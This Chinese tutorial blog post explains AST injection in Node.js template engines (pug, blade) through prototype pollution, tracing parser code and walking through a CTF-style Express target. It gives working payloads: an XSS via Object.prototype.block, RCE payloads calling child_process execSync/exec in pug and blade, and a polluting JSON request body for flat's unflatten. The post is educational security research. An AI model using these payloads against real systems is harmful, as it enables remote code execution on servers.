一篇文章带你理解AST Injection

一文带你理解AST Injection

模版引擎是什么

JS web开发中常用的模版引擎如 ejs、pug、handlebars
功能:动态渲染HTML代码,创建可重复使用的页面结构

ejs 模版使用

// 安装EJS模块:npm install ejs

// 引入EJS模块
const ejs = require(‘ejs’);

// 定义模板
const template = `

Hello, <%= name %>!

`;

// 渲染模板
const data = { name: ‘John’ };
const html = ejs.render(template, data);

console.log(html);
handlebars 模版使用

// 安装Handlebars模块:npm install handlebars

// 引入Handlebars模块
const handlebars = require(‘handlebars’);

// 定义模板
const template = `

Hello, {{name}}!

`;

// 编译模板
const compiledTemplate = handlebars.compile(template);

// 渲染模板
const data = { name: ‘John’ };
const html = compiledTemplate(data);

console.log(html);
pug 模版使用

// 安装Pug模块:npm install pug

// 引入Pug模块
const pug = require(‘pug’);

// 定义模板
const template = h1 Hello, #{name}!;

// 编译模板
const compiledTemplate = pug.compile(template);

// 渲染模板
const data = { name: ‘John’ };
const html = compiledTemplate(data);

console.log(html);
总结:可以看到模版引擎其实都有各自的一些特定语法规则,比如 pug 中可以通过 #{name} 来引用外部环境的变量, ejs 则是 <%= name %>。通过这种方式简化html代码的编写,同时实现模版重用

模版引擎的工作原理

本质上,引擎是通过针对你使用模版语言编写的模版进行解析,从而生成新的JS代码。大体过程可以概括如下:

词法解析 -> 语法解析 -> 代码生成

但是在语法树处理的过程中,在处理节点的时候,存在大量的赋值、循环操作,而在大部分模版引擎中,都是这么写的:

attrs[name] = attrs[value]

if(ast.block){

}

for(var i in node){

}
赋值操作未判断对应的属性是否为对象自身的属性,导致访问到原型链的 Object.prototype 的属性
判断某个属性是否存在,同样未判断是否为对象自身属性是否存在,若存在原型链污染,则可以进入if判断
JS的 for…in 循环会遍历对象的所有可枚举属性,包括原型链上的属性。例如:
let obj = { a: 1, b: 2 };
obj.proto.c = 3;
for (let i in obj) {
console.log(i); // a, b, c
}
因此若存在原型链污染,则可以随意修改AST树,进而影响生成的代码,最终达到RCE(远程代码执行)的目的

需要注意的是:

AST树的生成本质上是影响生成的字符串,因此也可以导致XSS漏洞
代码执行的那一步才会导致RCE,这时候需要第一步通过原型链污染注入代码,进而影响生成的代码

pug template AST injection 示例

const pug = require(‘pug’);

// 模拟原型链污染
Object.prototype.block = {“type”:“Text”,“val”:<script>alert(origin)</script>};

const source = h1= msg;

var fn = pug.compile(source, {});
var html = fn({msg: ‘It works’});

console.log(html); //

It works


当执行到 fn({msg: ‘It works’}); 这一步的时候,本质上是进入了一段函数

打印出这段函数的代码,可以看到通过原型链污染我们实现了向生成代码中插入一段字符串

(function anonymous(pug
) {
function template(locals) {var pug_html = “”, pug_mixins = {}, pug_interp;var pug_debug_filename, pug_debug_line;try {;
var locals_for_with = (locals || {});

(function (msg) {
  ;pug_debug_line = 1;

pug_html = pug_html + “\u003Ch1\u003E”;
;pug_debug_line = 1;
pug_html = pug_html + (pug.escape(null == (pug_interp = msg) ? “” : pug_interp)) + “\u003Cscript\u003Ealert(origin)\u003C\u002Fscript\u003E\u003C\u002Fh1\u003E”;
}.call(this, “msg” in locals_for_with ?
locals_for_with.msg :
typeof msg !== ‘undefined’ ? msg : undefined));
;} catch (err) {pug.rethrow(err, pug_debug_filename, pug_debug_line);};return pug_html;}
return template;
})

AST Injection原理分析(以pug为例)

语法树结构
pug 解析 h1= msg ,生成的语法树结构:

{
“type”:“Block”,
“nodes”:[
{
“type”:“Tag”,
“name”:“h1”,
“selfClosing”:false,
“block”:{
“type”:“Block”,
“nodes”:[
{
“type”:“Code”,
“val”:“msg”,
“buffer”:true,
“mustEscape”:true,
“isInline”:true,
“line”:1,
“column”:3
}
],
“line”:1
},
“attrs”:[

        ],
        "attributeBlocks":[

        ],
        "isInline":false,
        "line":1,
        "column":1
    }
],
"line":0

}
语法树生成后,会调用 walkAst 执行语法树的解析过程,依次对每个节点的类型进行判断,即如下代码:

function walkAST(ast, before, after, options){

parents.unshift(ast);

switch (ast.type) {
    case 'NamedBlock':
    case 'Block':
      ast.nodes = walkAndMergeNodes(ast.nodes);
      break;
    case 'Case':
    case 'Filter':
    case 'Mixin':
    case 'Tag':
    case 'InterpolatedTag':
    case 'When':
    case 'Code':
    case 'While':
      if (ast.block) { // 注意这里
        ast.block = walkAST(ast.block, before, after, options);
      }
      break;
    case 'Text':
      break;
}
parents.shift();

}

语法树执行顺序

以刚刚生成的语法树结构举例,解析顺序为:

Block
Tag
Block
Code
…?
注意第4步解析 node.Type 为 Code 类型,会执行如下代码:

case ‘Code’:
case ‘While’:
if (ast.block) { // 注意这里
ast.block = walkAST(ast.block, before, after, options);
}
判断 ast.block 属性是否存在,此处的 ast 即当前ast语法树的节点
如果存在,继续递归解析 block

结合原型链污染

如果某处存在原型链污染漏洞,使得

Object.prototype.block = {“type”:“Text”,“val”:<script>alert(origin)</script>};
那么 ast.block 就会访问到 ast.proto.block ,即Object.prototype.block 的属性

此时代码输出结果,导致了XSS

const pug = require(‘pug’);

Object.prototype.block = {“type”:“Text”,“val”:<script>alert(origin)</script>};

const source = h1= msg;

var fn = pug.compile(source, {});
var html = fn({msg: ‘It works’});

console.log(html); //

It works

RCE

我们知道pug本质上是将一段代码,如 h1 =msg 编译为一段js代码,背后其实就是生成语法树+ new Function

因此如果能通过AST Injection插入节点,并使之成为代码,即可达到远程代码执行的目的。

刚好pug中就有如下代码:

// /node_modules/pug-code-gen/index.js

if (debug && node.debug !== false && node.type !== ‘Block’) {
if (node.line) {
var js = ';pug_debug_line = ’ + node.line;
if (node.filename)
js += ';pug_debug_filename = ’ + stringify(node.filename);
this.buf.push(js + ‘;’);
}
}
那么我们通过 AST Injection + Prototype Pollution 即可实现RCE

const pug = require(‘pug’);

Object.prototype.block = {“type”:“Text”,“line”:console.log(process.mainModule.require('child_process').execSync('id').toString())};

const source = h1= msg;

var fn = pug.compile(source, {});
var html = fn({msg: ‘It works’});

console.log(html);

Attack example

express 开发的web服务,其中一个CGI如下:
(注,镜像已经上传,本地有docker环境可直接运行 docker run -d --restart=always -p 8007:1337 rayepeng/blitzprop:latest )

router.post(‘/api/submit’, (req, res) => {
const { song } = unflatten(req.body);

if (song.name.includes('Not Polluting with the boys') || song.name.includes('ASTa la vista baby') || song.name.includes('The Galactic Rhymes') || song.name.includes('The Goose went wild')) {
    return res.json({
        'response': pug.compile('span Hello #{user}, thank you for letting us know!')({ user:'guest' })
    });
} else {
    return res.json({
        'response': 'Please provide us with the name of an existing song.'
    });
}

});
本地跑起来后运行在1337端口:
在这里插入图片描述

原型链污染

注意到这一行代码:

const { song } = unflatten(req.body);
unflatten 这个库存在原型链污染

var unflatten = require(‘flat’).unflatten;
unflatten({ ‘proto.polluted’: true });
console.log(this.polluted); // true

AST Injection

注意到这一行代码:

pug.compile(‘span Hello #{user}, thank you for letting us know!’)({ user:‘guest’ })
结合原型链污染,可以实现RCE

{
“song.name”: “The Goose went wild”,
proto.block”:{
“type”:“Text”,
“line”:“process.mainModule.require(‘child_process’).exec(‘/System/Applications/Calculator.app/Contents/MacOS/Calculator’)” // 可以执行任意命令
}
}
接下来实际分析一个模版引擎的漏洞挖掘案例:

blade漏洞挖掘实例

除去上文介绍的三种模版引擎,blade 也是常用的一种,安装方法

npm install blade
编写一个示例:

const blade = require(‘blade’);

const template = html head title Blade body #nav ul - for(var i in nav) li a(href=nav[i])= i #content.center h1 Blade is cool;
blade.compile(template, {‘debug’: true}, function(err, tmpl) {
console.log(err);
});
正常得到的语法树为:

{
doctypes: [],
nodes: [
{
type: ‘tag’,
name: ‘html’,
id: null,
classes: [],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘head’,
id: null,
classes: [],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘title’,
id: null,
classes: [],
attributes: {},
children: [ { escape: true, type: ‘text’, text: ‘Blade’ } ],
line: 3,
col: 9
}
],
line: 2,
col: 5
},
{
type: ‘tag’,
name: ‘body’,
id: null,
classes: [],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘div’,
id: ‘nav’,
classes: [],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘ul’,
id: null,
classes: [],
attributes: {},
children: [
{
type: ‘code’,
code: ‘for(var i in nav)’,
multiline: false,
children: [
{
type: ‘tag’,
name: ‘li’,
id: null,
classes: [],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘a’,
id: null,
classes: [],
attributes: { href: [Object] },
children: [ [Object] ],
line: 9,
col: 25
}
],
line: 8,
col: 21
}
],
line: 7,
col: 17
}
],
line: 6,
col: 13
}
],
line: 5,
col: 9
},
{
type: ‘tag’,
name: ‘div’,
id: ‘content’,
classes: [ ‘center’ ],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘h1’,
id: null,
classes: [],
attributes: {},
children: [
{
escape: true,
type: ‘text’,
text: ‘Blade is cool’
}
],
line: 11,
col: 13
}
],
line: 10,
col: 9
}
],
line: 4,
col: 5
}
],
line: 1,
col: 1
}
]
}
既然是挖掘AST Injection,此时我们假设随便给 Object.prototype 污染个属性

Object.prototype.otherprop = {‘test’: ‘test’};
此时得到的语法树变成了如下,且代码运行报错:

{
doctypes: [],
nodes: [
{
type: ‘tag’,
name: ‘html’,
id: null,
classes: [],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘head’,
id: null,
classes: [],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘title’,
id: null,
classes: [],
attributes: {},
children: [ { escape: true, type: ‘text’, text: ‘Blade’ } ],
line: 3,
col: 9
}
],
line: 2,
col: 5
},
{
type: ‘tag’,
name: ‘body’,
id: null,
classes: [],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘div’,
id: ‘nav’,
classes: [],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘ul’,
id: null,
classes: [],
attributes: {},
children: [
{
type: ‘code’,
code: ‘for(var i in nav)’,
multiline: false,
children: [
{
type: ‘tag’,
name: ‘li’,
id: null,
classes: [],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘a’,
id: null,
classes: [],
attributes: { href: [Object], undefined: undefined },
children: [ [Object] ],
line: 9,
col: 25
}
],
line: 8,
col: 21
}
],
line: 7,
col: 17
}
],
line: 6,
col: 13
}
],
line: 5,
col: 9
},
{
type: ‘tag’,
name: ‘div’,
id: ‘content’,
classes: [ ‘center’ ],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘h1’,
id: null,
classes: [],
attributes: {},
children: [
{
escape: true,
type: ‘text’,
text: ‘Blade is cool’
}
],
line: 11,
col: 13
}
],
line: 10,
col: 9
}
],
line: 4,
col: 5
}
],
line: 1,
col: 1
}
]
}
注意到出现在第9行处理代码的时候:

children: [
{
type: ‘tag’,
name: ‘a’,
id: null,
classes: [],
attributes: { href: [Object], undefined: undefined },
children: [ [Object] ],
line: 9,
col: 25
出现了一个 undefined 的属性,这里是怎么来的呢?

以及,堆栈报错,可以作为辅助漏洞挖掘的信息


TypeError: Compile error: Cannot read properties of undefined (reading ‘text’)
at

at Compiler._compileNode (/..../js-ast-injection/node_modules/blade/lib/compiler.js:309:17)
at Compiler._compileNode (/..../js-ast-injection/node_modules/blade/lib/compiler.js:356:12)
at Compiler._compileNode (/..../js-ast-injection/node_modules/blade/lib/compiler.js:486:11)
at Compiler._compileNode (/..../js-ast-injection/node_modules/blade/lib/compiler.js:356:12)
at Compiler._compileNode (/..../js-ast-injection/node_modules/blade/lib/compiler.js:356:12)
at Compiler._compileNode (/..../js-ast-injection/node_modules/blade/lib/compiler.js:356:12)
at Compiler._compileNode (/..../js-ast-injection/node_modules/blade/lib/compiler.js:356:12)
at Compiler.compile (/..../js-ast-injection/node_modules/blade/lib/compiler.js:114:9)
at Object.compile (/..../js-ast-injection/node_modules/blade/lib/blade.js:57:12)
at Object.<anonymous> (/..../js-ast-injection/blade1.js:23:7) {

source: ‘html\n’ +
’ head\n’ +
’ title Blade\n’ +
’ body\n’ +
’ #nav\n’ +
’ ul\n’ +
’ - for(var i in nav)\n’ +
’ li\n’ +
’ a(href=nav[i])= i\n’ +
’ #content.center\n’ +
’ h1 Blade is cool’,
column: undefined,
lastFilename: undefined,
filename: undefined,
line: undefined
}

代码分析

Blade模版引擎的处理流程和其他模版引擎类似,如下过程:代码 ->词法分析 -> ast 树 -> code-gen
单纯从堆栈信息,只能看到处理语法树时候遇到的报错,具体在这里:

for(var i in attrs)
{
//interpolate text attributes
if(attrs[i].text)
{
var stringified = JSON.stringify(attrs[i].text),
interpolated = bladeutil.interpolate(stringified, ns);
//check to see if this text attribute needs to be interpolated
if(interpolated != stringified)
{
delete attrs[i].text;
attrs[i].code = interpolated;
}
}
因为 attrs[i].text 显然是去访问一个 undefined 的属性,所以就会报错,这里无法获得更多信息了,只能动态调试代码去分析了。

调用栈分析

blade.compile 函数跟进,会调用到内部模块的 parse
跟进 parser.parse 函数
在这里插入图片描述

文件位于: node_modules/blade/lib/parser/index.js

通过闭包导出了个函数:
在这里插入图片描述

跟进我们想要的函数,从函数命名上可以看出就是在利用堆栈去处理字符串,生成ast树,基本的编译原理了属于是
在这里插入图片描述

我们只关注 attributes 的处理,找到对应的函数, parse_attribute
在这里插入图片描述

这行代码:

result0 = (function(offset, line, column, name, escape, value) {
return {
‘name’: name,
‘value’: {
‘escape’: escape != “!”,
‘code’: value
}
};
})(pos0.offset, pos0.line, pos0.column, result0[0], result0[1], result0[3]);
就是返回一个属性的对象,这个是符合正常逻辑的

但是此时还没有看到我们想搞明白的 undefined 属性是怎么出现的,不急

我们先从函数这个返回, 因为我们知道生成的这个属性肯定是要加到对应的ast树上的

果然,从 parse_attribute 返回,经过了一段处理代码之后,到达了这一处:
在这里插入图片描述

result0 = (function(offset, line, column, first_attr, next_attrs) {
var attrs = {};
attrs[first_attr.name] = first_attr.value;
for(var i in next_attrs)
attrs[next_attrs[i].name] = next_attrs[i].value;
return attrs;
})(pos0.offset, pos0.line, pos0.column, result0[3], result0[4]);
其中: attrs[first_attr.name] = first_attr.value;
在这里插入图片描述

赋值完后,还有一个循环,刚好能够取出原型链中的属性,实现 ast injeciton
在这里插入图片描述

如下图:注意到 i 就是原型链中的属性

在这里插入图片描述

这样我们就明白了为啥导致AST树中出现 undefined ,我们只需要加入name 和 value 属性即可

Object.prototype.otherprop = {‘code’: ‘console.log(1)’, “name”: “abc”, “value”: “def”};

RCE

既然可以注入任意属性了,那我们就可以利用这一点,向 attributes 中写入代码

注意到在处理AST生成代码的过程中,会处理 code 的属性
在这里插入图片描述

for(var i in attrs)
{
//interpolate text attributes
if(attrs[i].text)
{
var stringified = JSON.stringify(attrs[i].text),
interpolated = bladeutil.interpolate(stringified, ns);
//check to see if this text attribute needs to be interpolated
if(interpolated != stringified)
{
delete attrs[i].text;
attrs[i].code = interpolated;
}
}
//take care of text attributes here
if(attrs[i].text != null)
{
if(attrs[i].escape)
this._push(“’ " + i + “=” + bladeutil.quote(
JSON.stringify(runtime.escape(attrs[i].text)) ) + “'”);
else
this._push(”’ " + i + “=” + bladeutil.quote(
JSON.stringify(attrs[i].text) ) + “'”);
}
//take care of code attributes here
// 在这里注入代码!!!
else
varAttrs += “,” + JSON.stringify(i) + “:{v:” + attrs[i].code +
(attrs[i].escape ? “,e:1” : “”) +
(i == “class” && attrs[i].append ?
“,a:” + JSON.stringify(attrs[i].append): “”) + “}”;
Payload如下,这样就能实现AST Injection+ RCE了!

Object.prototype.someprop = {
‘name’: ‘somename’,
‘value’: ‘somevalue’,
‘code’ : “process.mainModule.require(‘child_process’).execSync(whoami)”
};

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值